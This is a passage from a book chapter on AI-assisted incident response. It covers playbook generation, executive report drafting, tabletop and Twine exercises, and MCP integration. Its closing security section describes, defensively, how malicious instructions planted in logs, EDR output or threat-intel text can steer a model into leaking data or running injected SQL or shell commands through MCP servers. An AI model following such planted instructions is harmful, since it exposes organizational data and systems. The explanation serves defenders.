This transformation preserves essential information for the intended audience, allowing the analyst to focus on investigation efforts while still communicating pertinent information. This technique is also easily adaptable to other audiences, including legal teams, key stakeholders, and GRC teams.

The analyst should always verify the accuracy of the model-generated output and adjust the tone to match organizational communication standards before distribution.

Intermediate Use Cases

Now that we’ve looked at some introductory use cases, let’s explore more sophisticated AI applications to accelerate incident response. The following use cases employ more complex, structured prompts to generate more sophisticated output: playbooks that guide investigation procedures, report drafts that document incident findings, and exercise scenarios that test organizational readiness.

Generating Incident Response Playbooks

Playbooks provide step-by-step guidance for responding to specific incident types. Effective playbooks integrate a response process (such as the DAIR model or NIST SP 800-61) with techniques specific to the Event of Interest (EOI) being investigated.

Playbooks are valuable for analysts, especially during active incidents, providing guidance on what to do next when investigating an EOI or IOC. They are also valuable for the organization, ensuring consistent response practices across different analysts and teams. Playbooks should be customized for the organization’s environment, tools, and policies.

Writing comprehensive playbooks manually can be tedious. Attack techniques evolve, requiring frequent updates to playbooks. Further, there is a seemingly endless supply of TTPs used by attackers, warranting lots of different playbooks, or complex documents that cover the playbook needs across different attacker tactics. AI models can accelerate playbook development by generating initial drafts that analysts then refine and customize.

Structured Prompt for Playbook Generation

Supporting the response process described in the DAIR model, I wrote a structured prompt to guide the model in generating incident response playbooks. [3] This prompt is lengthy but provides clear instructions, output format definitions, reasoning steps, and context to help the model produce high-quality playbooks based on the described EOI, available at https://urls.sec504.org/playbookprompt.

GitHub Gist showing structured prompt instructions for AI-assisted incident response playbook generation
Figure 12. IR Playbook Generation Structured Prompt
I developed and tested the IR playbook prompt for the DAIR model primarily using ChatGPT models, though it will also work with other platforms that support structured prompting.

The prompt uses structured Markdown formatting and XML-style tags to delineate instructions, context, and output requirements. An excerpt of the structure in the prompt is shown in Listing 6.

Listing 6. DAIR Model Incident Response Playbook Generation Prompt
$ wget -q https://urls.sec504.org/playbookprompt -O playbookprompt.txt
$ grep -E "^#" playbookprompt.txt
# Role and Objective/Task (1)
# Instructions
# Reasoning Steps
# Output Format
## Overview
## Description
### Detect Steps
### Verify Steps
### Triage Steps
### Scope Steps
### Contain Steps
### Eradicate Steps
### Recover Steps
### Debrief Steps
## References
## Version Control
# Example Playbook
# Summary
1 Some output has been removed for brevity.

Pasting the prompt into the model chat interface prompts the model to ask for the specific EOI to be investigated, along with organizational context such as tools in use, policies, and environmental details. Supplying an EOI, such as a need to respond to a possible Windows infostealer malware with data exfiltration via cloud storage, will direct the model to produce a playbook draft, as shown in the example in Figure 13.

ChatGPT generating a Windows infostealer with cloud storage exfiltration incident response playbook in Markdown
Figure 13. Playbook Generation Model Response
Generating the playbook will take several minutes as the model works through the detailed instructions and output format requirements. Explicitly specifying the use of the ChatGPT thinking model is not required, but it helps ensure the model applies reasoning steps effectively during generation.

The model will generate a complete playbook that integrates the DAIR response process with techniques specific to the described EOI in Markdown format. Analysts can use the Markdown format directly, or convert it to HTML, Microsoft Word, or other formats as needed. An excerpt from the generated playbook is shown in Listing 7 (a full example is available at https://urls.sec504.org/playbookexample).

Listing 7. Playbook Generation Output Excerpt
# IR Playbook - Windows Infostealer With Cloud Storage Exfiltration

## Overview

The purpose of this playbook is to guide incident responders through detection, verification, triage, scoping, containment, eradication, and recovery for a suspected Windows infostealer infection where stolen data is being staged and exfiltrated via a cloud storage service (e.g., OneDrive/SharePoint, Dropbox, Google Drive, Box).

## Description

This event involves one or more Windows endpoints exhibiting infostealer behavior (suspicious process execution, unusual browser data access, new persistence artifacts, credential access activity) along with indications of outbound data transfer to cloud storage. The EOI may originate from EDR telemetry, proxy/DNS/firewall logs, abnormal user sign-ins, cloud audit logs showing unusual file uploads, or user-reported symptoms (unexpected MFA prompts, account lockouts, "new device" sign-ins). Typical infostealers are commodity malware-as-a-service families with rapid delivery and frequent infrastructure churn, often used to bootstrap follow-on access.  [oai_citation:1‡Microsoft](https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/?utm_source=chatgpt.com)

## Dynamic Approach to Incident Response

Apply these steps to detect, verify and triage, scope, contain, eradicate, and recover from the incident.

### Detect Steps

Apply the following steps to investigate the Event of Interest (EOI). Use the information provided by the user to guide the investigation.

Start by capturing the "minimum viable facts" so your investigation doesn’t drift. You’re trying to answer: **which hosts**, **which users/identities**, **which cloud storage provider**, **what data**, and **when**.

**Inputs to gather immediately (answer what you can now):**
- Which telemetry exists: EDR (Defender/MDE/CrowdStrike), SIEM, web proxy, DNS logs, firewall logs, M365/Entra audit logs, CASB?
- Cloud storage in scope: OneDrive/SharePoint, Dropbox, Google Drive, Box, others?
- Scope hints: single host/user or multiple? any VIPs? any regulated data?

Then perform endpoint-centric detection on the suspect host(s):

- Confirm basic host and logged-on user context:

  ```powershell
  hostname
  whoami
  quser
  ipconfig /all
  Get-Date
  ```

The playbook continues with detailed steps for each DAIR process waypoint, tailored to the specific EOI.

Refining Generated Playbooks

AI-generated playbooks require review and refinement before operational use. Analysts can accelerate generating playbooks but should ensure the output is accurate, complete, and customized to the organization’s environment. Key refinement steps include:

  • Verify that commands and queries are syntactically correct.

  • Adjust tool references to match actual organizational tools.

  • Add organization-specific contacts, escalation paths, and approval requirements.

  • Remove or flag any steps that don’t apply to the environment.

  • Test procedures where possible to confirm they work as described.

After refining a generated playbook, consider using the refined version as an example in subsequent prompts. This one-shot prompting approach helps the model better match the desired output format and level of detail.

Drafting Incident Reports

As we saw in Completing Incident Documentation, incident documentation is an important part of the debrief process, preserving institutional knowledge, supporting compliance, and serving as reference material for future incidents. AI can accelerate the transformation of investigation findings into structured reports tailored for different audiences.

Report Draft Generation

AI models can assist in drafting incident reports by organizing investigation findings into structured formats. By supplying incident findings along with a prompt that defines the desired report structure and audience, analysts can quickly generate draft reports to review and refine.

For example, using the details provided for a sample incident stemming from a workstation compromise via a vulnerable Adobe Reader exploit, we can prompt the model to draft an executive summary report, as shown in Listing 8. [4]

Listing 8. Executive Report Draft Prompt with Incident Findings
Using the incident findings below, create a draft incident summary report suitable for executive leadership. Follow this structure:

1. Executive Overview (incident type, detection date, brief description, business impact)
2. Key Findings (what happened, what was affected, what data was at risk)
3. Response Actions Taken (containment, eradication, recovery status)
4. Recommendations (immediate actions, longer-term improvements)
5. Decisions Required (what leadership needs to approve or fund)

~~~~
# Incident Findings - SampleCorp Breach

## Affected Systems

- WKST01.samplecorp.com (development environment, source code and API credentials)
- HR01.samplecorp.com (HR system, employee PII including SSNs)

## Timeline

- 2026-01-15 00:27 - Employee opened malicious PDF (cv.pdf) exploiting Adobe Reader vulnerability
- 2026-01-15 00:35 - Unauthorized access to development directories and API keys
- 2026-01-15 00:50 - Lateral movement via buffer overflow in HR application
- 2026-01-15 01:30 - Employee database compressed and exfiltrated via SSH tunnel
- 2026-01-15 02:30 - SOC detected activity, isolated systems via VLAN
- 2026-01-15 03:43 - Firewall rules updated blocking C2 IP 192.168.220.66
- 2026-01-15 04:11 - Malware removed from both systems
- 2026-01-15 05:21-05:58 - Both systems restored from verified backups

## Technical Details

- Initial vector: Malicious PDF exploiting CVE in Adobe Reader 10.0

[...] (1)
1 Additional technical details omitted for brevity.

For this example, we used Claude Opus to generate the report. Without specifying the desired output format, Claude Opus generated a Microsoft Word document that summarizes the technical details of the incident findings in a structured report, as shown in the Figure 14.

Claude response with review notes on breach notification timing and regulatory language in the draft report
Figure 14. Completed Executive Report Prompt Results

Organizing the findings into the requested structure, the model converted the technical details into executive-audience focused language, identifying gaps where additional information might be needed. An excerpt of the report is shown in Figure 15.

Microsoft Word document showing the AI-generated SampleCorp incident summary report with executive overview and key findings
Figure 15. Executive Report Draft Output Excerpt
I’ve covered this before in the chapter, but I think it bears repeating. Draft reports must be thoroughly reviewed to ensure accuracy before distribution. AI may misinterpret findings and draw incorrect conclusions, add plausible-sounding details not present in source data, omit important findings that don’t fit expected patterns, or use inappropriate tone or terminology for the audience. Treat AI-generated reports as starting points that accelerate formatting and organization, not finished products ready for distribution.
Enhancing Report Quality with Specialized Knowledge

AI models can do a reasonable job of generating incident reports based on supplied findings. However, generic models lack specialized knowledge of what makes incident response reports effective and don’t have access to organizational preferences for report structure, tone, content, or other best-practice guidance.

Without specialized guidance, models produce reports that are helpful but not distinctive. Reports need an appropriate tone, clear executive summaries, prioritized remediation steps, and a structure that serves both immediate response needs and long-term organizational learning. The difficulty is that appropriate, clear, prioritized, and structured are not the same for every organization, and the model has no way of knowing those preferences without explicit input.

Specialized Knowledge Integration with MCP

Providing AI models with access to specialized incident response reporting guidance and previously-generated report samples can significantly improve the quality of AI-generated reports. Rather than relying solely on the model’s training data about incident reports in general, the model can reference specific best practices and quality criteria developed by experts in the field.

MCP provides a standardized method for connecting AI models to external tools and data sources that supply specialized knowledge. MCP servers expose capabilities that AI models can query to retrieve relevant guidance when needed. An analyst working on a report draft can request evaluation against IR-specific quality criteria, and the model retrieves those criteria from an MCP server rather than requiring them to be embedded in every prompt.

We’ll cover MCP in greater detail in Section 1.5.

MCP servers can provide specialized knowledge for incident response reporting. Quality criteria help models evaluate draft reports against established standards for executive summaries, impact framing, tone, and appropriateness of technical detail. Report structure guidance ensures that models generate reports with sections and an organization appropriate to different incident types. Best-practice recommendations help models suggest remediation steps, communication strategies, and post-incident actions informed by incident response expertise.

Organizations can integrate these specialized knowledge sources through several approaches, each with different implementation complexity and data handling characteristics. Publicly accessible MCP servers provide general best practices that apply across organizations. Internal MCP servers can host organization-specific guidance, templates, and quality standards. Hybrid approaches combine external best practices with internal customizations to balance standardization with organizational needs.

For organizations unable to deploy MCP servers, specialized knowledge can be embedded directly in prompts or maintained in local documentation that analysts can reference when prompting models for report generation.
Zeltser IR Report Guidance

My friend and SANS faculty fellow Lenny Zeltser developed an MCP server that provides specialized guidance for incident response report generation and evaluation. Lenny took his years of experience writing incident reports and teaching effective report writing and codified best practices into a freely available MCP server that AI models can query to improve report quality. [5]

The MCP server offers three primary capabilities that assist analysts throughout the report-writing process:

  • Report creation assistance provides guidance across executive summaries, technical timelines, root cause analysis sections, and remediation recommendations. The guidance is adaptive based on incident type (for example, recognizing that ransomware incident reports have a different emphasis than business email compromise or insider threat documentation).

  • The draft evaluation assesses existing reports against quality criteria specific to incident response, including executive summary clarity, impact communication, a tone that avoids blame, and action-item prioritization.

  • Multi-report support addresses various security documentation needs beyond just incident response, though optimization focuses on IR use cases.

Analysts can connect Claude, ChatGPT, or other compatible tools to the Zeltser report writing server using standard MCP configuration, as shown in Listing 9 and in the Figure 16.

Listing 9. MCP Server Configuration Command
claude mcp add zeltser-search --transport http https://website-mcp.zeltser.com/mcp
Claude Code terminal adding the Zeltser search MCP server via HTTP transport configuration
Figure 16. MCP Server and Claude Code Configuration Example

Once configured, analysts working on incident response reports can request assistance with report evaluation or generation, and the model will direct the AI client to query the MCP server for relevant guidance. For example, after adding the MCP server as zeltser-search in Claude Code, I asked it to evaluate a report draft using the following prompt:

Review the IR report in @Incident\ Report.docx using zeltser-search.

Claude Code using the Zeltser search MCP server to review an incident response report
Figure 17. MCP Server and Claude Code, Report Advice Prompt

In this example, using the Hack The Box SampleCorp Breach report by Sebastian Hague, Claude Opus evaluated the report contents, drawing on guidance from the Zeltser MCP server to identify recommendations for improvement. [6] Zeltser’s MCP server applied specialized knowledge about IR reporting best practices to identify several areas for improvement, as shown in Listing 10.

Listing 10. Zeltser MCP Server Report Evaluation Output
Areas for Improvement by Section

Executive Summary

* Issue: Too long (approximately 500+ words vs. recommended 150 words maximum)

  The executive summary should be drastically shortened. Executives need the essential facts quickly. Consider this structure:

  On April 22, 2019 at 01:05 UTC, SampleCorp's SOC detected unauthorized
  access after an employee opened a malicious PDF. The attacker compromised
  two systems (WKST01 and HR01) containing proprietary code and employee data
  including SSNs. [CLARIFY: Data was/was not exfiltrated]. SOC contained the
  incident within 5 hours. Root causes: outdated Acrobat Reader, buffer overflow
  in proprietary HR app, and inadequate network access controls. Immediate actions
  complete; network segmentation and access controls being implemented. [If data
  was exfiltrated: Regulatory notifications in progress per GDPR/state breach laws.]

  Current stakeholder impact details should move to the dedicated Impact Analysis section, not the executive summary.

Timeline Issues

* Missing timezone: The report uses times like "01:05:00" without specifying the timezone. Given that SampleCorp may have offices or stakeholders in multiple locations, every timestamp should include timezone (e.g., "01:05:00 UTC" or "01:05:00 EDT").

  Example from timeline:
  - Current: "April 22nd, 2019, 00:27:27"
  - Better: "April 22nd, 2019, 00:27:27 UTC"

This is especially important for regulatory notifications with strict timeframes.
[\...]

Summary

This is a technically strong report with excellent forensic detail and clear response documentation. The primary issues are:

  1. Critical data exfiltration inconsistency that must be resolved
  2. Executive summary too long for busy executives
  3. Missing ownership and timelines in lessons learned
  4. Regulatory obligations not addressed despite potential PII exposure
  5. Lack of quantification in business impact areas

With this guidance, the analyst can make changes to the report or ask the model to review the report accordingly. Zeltser’s MCP server enables analysts to leverage specialized incident response reporting knowledge without having to embed that knowledge in every prompt, thereby significantly improving the quality of AI-generated reports.

Creating Tabletop Exercise Scenarios

In Conduct Tabletop Exercises and Incident Response Drills we looked at the value of tabletop exercises for testing organizational readiness and guiding teams through hypothetical incident scenarios. Crafting engaging, realistic scenarios is an important part of effective exercises, but developing them can be time-consuming and challenging. Developing an effective scenario requires balancing realism, complexity, and learning objectives. Realistic scenarios require understanding current threats, organizational context, and insight into existing systems for organizational-specific details. A single detractor who thinks the scenario is unrealistic can undermine the entire exercise. It’s up to the tabletop facilitator to design scenarios that engage participants, bringing realism, creativity, and energy to the exercise.

AI tools can help in designing tabletop scenarios, artifacts, and supporting elements, relieving some of the burden on exercise facilitators. This section demonstrates three approaches to AI-assisted scenario generation, progressing from simple idea generation to organizationally-grounded scenarios to interactive and gamified exercise formats.

Generating Scenario Ideas

Facilitators beginning scenario development can use straightforward prompts to generate initial concepts based on current threat landscapes. A basic prompt requests scenario ideas without requiring detailed organizational context or technical artifacts.

For example, a facilitator might prompt the model with a request like the one shown in Listing 11.

Listing 11. Basic Tabletop Exercise Scenario Prompt
Generate three tabletop exercise scenario concepts for an incident response team. Each scenario should:

- Be based on current threat actor techniques and realistic attack patterns
- Target a mid-sized organization in the healthcare sector
- Progress through multiple phases allowing discussion at each stage
- Include decision points that test communication, escalation, and containment procedures
- Run approximately 90 minutes with a facilitator guiding discussion

For each scenario, provide:
- Initial compromise method
- Three progressive injects that complicate the response
- Key learning objectives
- Discussion questions for each phase

Using Google Gemini, the model produced several scenario concepts, including the example shown in Listing 12.

Listing 12. Google Gemini Tabletop Exercise Scenario Example
# Scenario 1: The "Extorted Identity"

**Theme:** Adversary-in-the-Middle (AiTM) Phishing & Double Extortion Ransomware
**Target:** Mid-sized Healthcare Organization (Finance/Billing Department)
**Estimated Duration:** 90 Minutes

## 1. Concept Overview

A sophisticated threat actor utilizes a session-hijacking phishing attack to bypass Multi-Factor Authentication (MFA). The primary goal is to target the Finance and Billing department to exfiltrate Patient Health Information (PHI) and financial records before deploying a ransomware payload to maximize leverage.

## 2. Initial Compromise

A senior Billing Coordinator receives an "urgent" email appearing to be from the hospital's CFO. The email contains a link to a "Video Memo" regarding urgent 2026 payroll tax changes. The video uses **AI-generated deepfake audio and video** of the CFO.

When the coordinator clicks the link, they are directed to a proxy login page that mimics the organization’s Microsoft 365 portal. The coordinator enters their credentials and completes the MFA prompt. The attacker’s proxy server captures the **active session token**, allowing them to bypass MFA entirely and access the coordinator's mailbox and cloud storage.

## 3. Progressive Injects

### Inject 1: Detection & Initial Response (T + 30 mins)

The Security Operations Center (SOC) triggers a high-severity alert: "Anomalous Data Movement." Forensic logs show the Billing Coordinator’s account is transferring large volumes of data to an unrecognized IP address in Eastern Europe. Simultaneously, Azure AD logs show the account is logged in from both the hospital’s local IP and a known VPN exit node.
[...] (1)
1 Content removed for brevity.

In this example, the model generated multiple scenario concepts that facilitators can evaluate for relevance to organizational needs. This approach works well when exploring different incident types or when facilitators need inspiration for exercise themes. Generated concepts serve as starting points that facilitators can refine based on team maturity, recent incidents, or specific skills the exercise should develop.

Organizationally-Grounded Scenarios

More sophisticated scenario development incorporates actual organizational data to increase realism and relevance. By providing AI models with sanitized copies of log files, network diagrams, asset inventories, or authentication records, facilitators can generate scenarios that reflect the actual technical environment participants will recognize.

This approach addresses a common limitation of generic tabletop exercises where participants struggle to connect hypothetical scenarios to their real infrastructure, tools, and procedures. Scenarios grounded in organizational artifacts use familiar system names, realistic user accounts, and actual log formats, making the exercise more engaging and the lessons more transferable to real incidents.

Consider a business email compromise scenario where the facilitator wants to create realistic authentication and email activity patterns. The facilitator can provide the AI model with a Microsoft 365 audit log export (appropriately sanitized using techniques described in Section 1.1.2) along with a structured prompt as shown in Listing 13.

Listing 13. Organizationally-Grounded Tabletop Exercise Scenario Prompt
Using the Microsoft 365 audit log data attached, develop a business email compromise tabletop exercise scenario. The scenario should:

- Use actual usernames, email patterns, and authentication behaviors from the logs to establish realistic baseline activity
- Identify a plausible initial compromise vector consistent with the authentication patterns observed
- Create a timeline of attacker actions that would produce log entries similar in format and structure to the provided data
- Include three progressive injects that reveal new information through additional log entries
- Provide facilitator guidance on what log patterns participants should identify at each phase

Learning objectives:

- Email header analysis for spoofing detection
- Correlation of authentication logs with email activity
- Escalation procedures for financial fraud attempts
- Communication with executive stakeholders during active fraud attempts

Target duration: 30 minutes
Google Gemini prompt requesting a business email compromise tabletop exercise scenario from Microsoft 365 audit logs
Figure 18. Google Gemini Organizationally-Grounded Tabletop Exercise Scenario Generation

In this example, we used Google Gemini with a Microsoft 365 interactive login data file to supply context for the scenario. The model analyzed the log file structure, identified normal patterns in the data, and generated a scenario in which attacker activity would appear as anomalies relative to the established baseline. The compromise vector, injects, and facilitator guidance all reflected events in the supplied logging data, making the exercise feel authentic to participants familiar with their environment.

The fastest way to combat participant complaints of "this isn’t realistic" is to ground the scenario in actual organizational data.
Gemini-generated tabletop exercise scenario with user profiles and baseline activity from actual tenant log data
Figure 19. Google Gemini Tabletop Exercise Scenario Output

Facilitators can apply this approach with various organizational artifacts, including network traffic captures for intrusion detection scenarios, cloud audit logs for insider threat exercises, or EDR telemetry for malware response training. The important requirement is to provide sufficient sample data for the model to understand the format, structure, and normal patterns, while applying prudent caution to sanitize sensitive information.

Gamified, Interactive Exercise Generation with Twine

A more sophisticated AI-assisted tabletop scenario development produces interactive formats that participants can navigate through branching decision paths. Twine, an open-source tool for creating nonlinear interactive narratives, provides an effective platform for tabletop exercises where participant choices affect scenario progression. [7] Twine is widely used for interactive storytelling and game development, allowing authors to develop complex branching scenarios with rich media and conditional logic, as shown in the Figure 20. Twine produces HTML report output, allowing authors to customize the storytelling experience with custom CSS and other rich content, producing interactive decision elements like the example shown in Figure 21.

Think of Twine as a tool for creating "choose your own adventure"-style stories where the reader makes choices that influence the narrative path. Through rich media, scripting capabilities, and conditional logic, Twine can create complex interactive experiences as HTML, making it a great option for gamified tabletop exercises.
Twine story editor showing interconnected passage nodes for an incident response book authoring exercise
Figure 20. Twine Story Authoring Interface
Browser rendering of a Twine interactive story with narrative text and two branching choice links
Figure 21. Twine HTML Output Example

Traditional tabletop exercises often use linear progressions in which facilitators reveal injects at predetermined intervals or when they deem appropriate. Interactive formats allow exercises to branch based on choices, showing participants the consequences of different response strategies. For example, if participants choose immediate containment before scoping, the scenario might reveal unrecognized compromises and missed opportunities to effectively contain the entire incident. Alternatively, if the participants use an IOC to effectively scope the breadth of the incident, they might unlock more evidence that provides valuable insight into attacker tactics that can be applied later in the scenario.

AI models can generate Twine-compatible output files (.twee) that facilitators can import directly into Twine for interactive exercise delivery. Twee files are plain text that define passages (scenario states) and links (choices) in a structured format, as shown in the example in Listing 14.

Listing 14. Twee Format Example
:: StoryTitle
The Incident Response Book Author

:: Start
You sit down at your desk, coffee in hand, ready to write your book on incident response. The blank page stares back at you.

Where do you begin?

[[Start with the fundamentals of IR->Fundamentals]]
[[Jump straight into real-world case studies->CaseStudies]]

:: Fundamentals
You decide to lay the groundwork first. Chapter 1: "What is Incident Response?"

You write about the DAIR model: Prepare, Detect, Verify/Triage, Scope, Contain, Eradicate, Recover, Debrief. You explain each phase with clear examples.

[[Continue to detection techniques->Detection]]
[[Add a war story from your past->WarStory]]

:: CaseStudies
You open with a gripping supply chain hack: Supply Chain Calamity. You provide first person perspectives from the incident response analyst, and the attacker.

[[Add a brief intro chapter first->Fundamentals]]
[[Trust the reader and keep going->Detection]]
In Twine, each passage begins with :: PassageName, followed by the content presented to the user, including possible decision links marked with -> and the target passage name.
Gamified Learning for Incident Response Training

Gamification applies game design elements to non-game contexts to increase engagement and improve learning outcomes. Interactive tabletop exercises using Twine incorporate several gamification principles that enhance the effectiveness of incident response training.

Choice and Consequence

Branching scenarios, where decisions lead to different outcomes, engage participants more deeply than passive observation. Responders see the direct results of their choices, reinforcing the connection between actions and consequences in ways that traditional exercises cannot achieve. This immediate feedback loop accelerates learning by making abstract concepts concrete.

Safe Experimentation

Gamified exercises create low-stakes environments where participants can explore risky decisions without real-world consequences. An analyst can choose to delay containment to gather more forensic evidence and observe what happens when the attacker escalates. In traditional exercises, fear of making the "wrong" choice in front of peers can inhibit learning. Interactive formats remove this pressure by accommodating private exploration.

Replayability and Mastery

Traditional tabletop exercises typically run once, limiting exposure to different decision paths. Interactive scenarios support multiple playthroughs, allowing participants to explore alternative approaches and compare outcomes. This repetition builds pattern recognition and decision-making confidence more effectively than single-exposure learning.

Engagement Through Agency

Participants who actively make decisions demonstrate higher engagement than those who passively receive information. Agency in scenario progression transforms learners from observers to active participants. This engagement leads to better retention and more effective transfer of learning objectives.

Organizations implementing gamified tabletop exercises should maintain focus on learning objectives while embracing entertainment value. The goal is to make training more effective by leveraging game mechanics that demonstrably improve learning outcomes for complex, decision-heavy domains like incident response. By making the exercise enjoyable and interactive, facilitators can foster deeper engagement and more meaningful skill development among incident response teams.

AI models can generate Twine-compatible scenarios using structured prompts that define scenario elements, decision points, and learning objectives. By providing the model with clear instructions and examples of the desired output format, facilitators can produce interactive scenarios that they can import directly into Twine for exercise delivery.

I have developed a sample prompt that will help analysts generate interactive tabletop exercise scenarios in Twine format, available at https://urls.sec504.org/twinetabletopprompt. Using this prompt, the model will ask the user a series of questions to gather the necessary context for scenario generation. These questions are optional, but providing detailed answers will better align the generated scenario with organizational needs:

  1. What type of security incident should this exercise cover?

  2. Describe the target organization.

  3. How was the incident first detected?

  4. What are the critical systems or data assets at risk in this scenario?

  5. Any specific threat actor profile you want to use?

  6. What are the key learning objectives?

  7. Do you have any supporting documentation, log files, or other content you would like me to integrate to add organization-specific context and realism?

For this application of accelerating incident response with AI, I downloaded the prompt from my terminal using wget (you can also download it from your browser), saving the file as PROMPT.md, as shown in Listing 15. Next, I launched Claude Code to generate a Twine tabletop exercise, directing it to use the prompt file to guide scenario creation, as shown in Figure 22.

Listing 15. Twine Tabletop Exercise Prompt Setup
$ wget -q -O PROMPT.md https://urls.sec504.org/twinetabletopprompt
$ ls -l
total 32
-rw-r—​r--@ 1 jwright  staff    12K Jan 17 11:22 PROMPT.md
Claude Code reading PROMPT.md instructions to generate an incident response tabletop exercise in Twee format
Figure 22. Claude Code Twine Tabletop Exercise Prompt Processing

Read and process the prompt directions in @PROMPT.md

In this section, we’re using Claude Code to leverage file system access for prompt management and output handling. OpenAI’s Codex and Google Gemini CLI tools also support file system access for similar workflows and could be used as alternatives to Claude Code.

Claude Code will process the prompt directions and guide the user through answering the necessary questions to generate a customized tabletop exercise, as shown in the example in Figure 23.

Claude Code asking scenario parameters including incident type selection for the tabletop exercise
Figure 23. Claude Code Twine Tabletop Exercise Prompt Question

After answering the questions, the model generates a Twine-compatible .twee file, as shown in Figure 24. Building and viewing the scenario as an HTML file allows the participant to navigate the interactive exercise, making decisions and exploring different paths based on their choices, as shown in Figure 25.

Twine editor displaying a large grid of interconnected passage nodes for a healthcare IR tabletop exercise
Figure 24. AI-Generated Twine Tabletop Exercise Decision Passages
Browser rendering of a Twine healthcare tabletop exercise with scenario text and four response choice buttons
Figure 25. AI-Generated Twine Tabletop Exercise Story View

Analysts can review the scenario in Twine and make any necessary adjustments. Alternatively, they can return to Claude Code to further refine the scenario by providing additional context or requesting modifications to specific passages or decision points to enhance the exercise experience as desired.

Using the supplied prompt, the Twee supports event saves so the participant can save progress, make decisions, and return to previous saves to experiment with different choice outcomes.

The intermediate techniques covered in this section demonstrate how AI can enhance common incident response workflows, from drafting reports and generating playbooks to building interactive training exercises. These capabilities represent practical, immediately applicable uses of AI that require minimal infrastructure beyond access to an AI model. In the next section, we’ll look at more advanced use cases that integrate AI with external systems for automated data retrieval, real-time analysis, and orchestrated response actions across security tooling.

Advanced Use Cases

Emerging integration standards and agentic AI systems present significant opportunities to accelerate incident response workflows. The Model Context Protocol (MCP) enables AI models to query security tools directly, while agentic systems can execute multi-step analysis tasks with minimal human intervention. These capabilities allow response teams to offload routine data gathering and correlation tasks, freeing analysts to focus on decision-making and containment actions.

Model Context Protocol for Defensive Operations

As we saw earlier in this chapter, MCP provides a standardized method for connecting AI models to external tools and data sources. MCP addresses a fundamental integration challenge: enabling AI systems to interact with the diverse applications and data sources that security teams rely upon.

In this section, we’ll look at the structure of MCP architecture and how MCP can enhance defensive operations by enabling AI models to retrieve real-time data from security tools, automate enrichment tasks, and correlate information across platforms.

Understanding MCP Architecture

To understand how to best leverage MCP to accelerate incident response, it helps to examine its architecture and components. MCP defines several components:

  • MCP Client: The interface through which users interact with the AI model (chat applications, software IDEs, custom interfaces).

  • MCP Server: A service that publishes tools the AI model can invoke to retrieve data or take actions.

  • Underlying Applications: The actual systems and data sources (SIEMs, ticketing systems, threat intelligence platforms, cloud services, source code management systems, etc.).

Three-tier architecture diagram showing MCP client connecting to MCP servers that interface with underlying applications
Figure 26. MCP Architecture Diagram

When a user issues a prompt, the MCP client informs the model about available tools. The model can then request tool execution to gather information relevant to the user’s request. Results flow back through the client to augment the model’s response with live data.

This architecture means an analyst can issue natural language queries that obtain data (stored or dynamically generated) from connected security tools:

  • Search authentication logs from the past 24 hours for any failed logins followed by successful logins from the same user.

  • Check threat intelligence for any information about the domain login.c1ic.link

  • Create a ticket for this incident and assign it to the on-duty analyst.

The model translates natural language intent into appropriate tool calls, retrieves results, and using the model’s processing features generates a coherent response.

Defensive Applications

MCP integration with AI models allows analysts to leverage powerful defensive capabilities that accelerate common incident response tasks.

Natural Language Threat Hunting

Analysts can describe what they are looking for in natural language, rather than learning and constructing complex query syntax. An MCP server connected to SIEM data and CTI services automatically translates queries like "Show me any systems that communicated with newly registered domains in the past week" into appropriate backend queries. This natural language interface lowers the barrier to threat hunting for analysts who understand threat-hunting techniques but lack platform-specific SIEM query-language expertise. Experienced analysts benefit as well by expressing complex hunt hypotheses without context-switching to query documentation.

Natural language access to SIEM platform interrogation offers a strategic benefit beyond analyst productivity: by abstracting from query language complexity, organizations reduce dependence on proprietary SIEM interfaces and mitigate vendor lock-in that arises when institutional knowledge becomes tied to platform-specific syntax.
Automated Enrichment

When investigating an indicator, MCP-connected tools can automatically gather context from multiple sources. Threat intelligence reputation, historical sightings in organizational logs, related indicators, and asset information for affected systems can all be retrieved and integrated into the response to a single analyst question. This automated enrichment eliminates the manual process of checking each data source individually, copying relevant findings, and assembling them into a coherent picture.

Cross-Platform Correlation

MCP servers connecting different security tools can empower queries that span multiple platforms. Finding all alerts related to a specific IP address across EDR, firewall, and email security platforms often requires logging into each platform, running separate queries, and manually correlating results. MCP-enabled correlation performs these lookups automatically and presents unified results. This cross-platform visibility helps analysts identify the full scope of activity without platform-specific access barriers.

Incident Documentation

MCP connections to ticketing systems allow analysts to update incident records through conversation. Documentation can be maintained without context-switching to separate interfaces. As analysts discover new findings, they can instruct the AI to update the incident ticket with specific details, maintaining documentation currency throughout the investigation. This conversational documentation reduces the common problem of outdated tickets that do not reflect the current investigation status.

Security Considerations

MCP integration introduces significant security considerations that organizations should understand.

Prompt Injection

Prompt injection is an attack technique where an adversary manipulates the model to circumvent controls or produce unintended output. When AI systems integrate data from external sources (including MCP server output), the model processes this content alongside its instructions. AI models have difficulty distinguishing between data they should analyze and instructions they should follow, creating an opportunity for attackers to embed malicious instructions within otherwise benign content, such as logging data, a list of Windows service descriptions from an EDR agent, or even a TTP description from a CTI platform. Successful prompt injection can lead to the disclosure of sensitive data, unauthorized model actions, or the manipulation of model behavior.

When MCP servers construct shell commands or database queries based on model output, prompt injection can enable classic injection attacks. Prompt injection vulnerabilities create opportunities for attackers to craft injected SQL statements that can disclose sensitive company data or to execute command injection attacks that run unauthorized commands against the MCP server or the MCP client.

Access Control

MCP servers should enforce the same access controls as direct tool access. An analyst should not gain additional capabilities through MCP that they do not have through direct interfaces. If an analyst cannot directly execute password resets in the identity management system, the MCP server should not allow password resets through AI-mediated requests either. Role-based access control applied to the MCP tool availability ensures analysts cannot bypass security controls through conversational interfaces.

Audit Logging

All MCP tool invocations should be logged with sufficient detail to reconstruct what actions were taken, by whom, and with what parameters. These logs serve the same purpose as logs from direct tool access, supporting incident investigation when something goes wrong, providing accountability for sensitive operations. Organizations should integrate MCP audit logs with existing security information and event management platforms or with dedicated systems when isolation of MCP logging is required.

Data Exposure

MCP can expose data to AI models, which then become part of the conversation context. Once data appears in a conversation, it may be retained by commercial AI platforms, subject to their data-handling policies. Organizations should consider what data sensitivity levels are appropriate for MCP-connected sources. Customer personally identifiable information, authentication credentials, and regulated data may require additional protections or may be prohibited from MCP exposure entirely.

Security research into MCP and AI model integration is ongoing, with new attack techniques and defensive measures emerging regularly. Organizations implementing MCP should monitor security guidance from Anthropic and the broader cybersecurity research community to stay current with evolving threats and best practices for mitigation.
MCP Supply Chain and Registry Risks

